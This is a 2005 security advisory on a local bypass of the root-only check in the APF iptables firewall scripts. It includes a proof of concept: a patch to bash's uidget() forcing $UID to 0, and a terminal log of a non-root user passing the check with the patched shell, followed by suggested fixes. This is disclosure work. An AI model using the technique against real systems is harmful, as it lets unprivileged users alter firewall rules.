===================================================== SB2005002: pron to bypass APF checking uid(0) routine ----------------------------------------------------- Date : 01-13-2005 Author : x90c@xxxxxxxxxxxxxxxx/~jyj9782 ----- Affected Version ----- apf-0.9.4-7 ( current at this time ) ----- Summary ----- APF is a policy based iptables firewall system designed for ease of use and configuration. It employs a subset of features to satisfy the veteran Linux user and the novice alike. Packaged in tar.gz and RPM formats, APF is ideal for deployment in any linux server environment. tarball From the website ( http://www.r-fx.org/apf.php ). 1) Smallest Flaw When below PoC commands are executed, which allows localusers to bypass the (only can use root) checking. therefore maybe an malicous user will can free to use admin scripts(apf, firewall..) such as changing rules or start/stop deamon and so on.. it's very dangerous from smallest things. but it might be didn't happen,, because this program has install.sh. it contains of "chmod 750 $INSPATH/firewall" .. but i can advise potentialities~ ----- PoC ----- STEP 1) Patch your bash source (vi shell.c +1099) as below. + u = 0; + current_user.gid = 0; + current_user.euid = 0; + current_user.egid = 0; -shell.c +1099- static int uidget () { uid_t u; u = 0; if (current_user.uid != u) { FREE (current_user.user_name); FREE (current_user.shell); FREE (current_user.home_dir); current_user.user_name = current_user.shell = current_user.home_dir = (char *)NULL; } current_user.uid = u; current_user.gid = 0; current_user.euid = 0; current_user.egid = 0; /* See whether or not we are running setuid or setgid. */ return (current_user.uid != current_user.euid) || (current_user.gid != current_user.egid); } STEP 2) run vulerable scripts only for root (0) using patched bash shell. root@testbed:/home/s/apf-0.9.4-7# ls CHANGELOG README apf.init files logrotate.d.apf COPYING.GPL README.antidos cron.daily install.sh root@testbed:/home/s/apf-0.9.4-7# cd files root@testbed:/home/s/apf-0.9.4-7/files# ls VERSION apf deny_hosts.rules extras log.rules sysctl.rules ad bt.rules doc firewall main.rules vnet allow_hosts.rules conf.apf ds_hosts.rules internals preroute.rules root@testbed:/home/s/apf-0.9.4-7/files# grep "UID" * apf:if [ "$UID" != "0" ]; then firewall:if [ "$UID" != "0" ]; then root@testbed:/home/s/apf-0.9.4-7/files# i don't want to install and so i just only tested as below. root@testbed:/tmp# ls -al b* f* -rwxr-xr-x 1 pt pt 2969870 2005-01-08 01:23 bash90 -rwxrwxr-x 1 root root 24 2005-01-08 01:23 fake_firewall root@testbed:/tmp# su pt pt@testbed:/tmp$ id uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel) pt@testbed:/tmp$ echo $UID 1001 pt@testbed:/tmp$ ./bash90 root@testbed:/tmp# echo $UID 0 root@testbed:/tmp# id uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel) root@testbed:/tmp# ./fake_firewall 1001 root@testbed:/tmp# exit exit pt@testbed:/tmp$ ./bash90 fake_firewall 0 pt@testbed:/tmp$ ----- Solution ----- # cp /bin/id /firewall_path/secure_id # chmod 700 /firewall_path/secure_id and changed the sources to get uid by right above file.. or i recommend upgrade new release to you.. ----- Credits ----- This smallest flaw was found by x90c(Kyong Joo, Jung) personaly.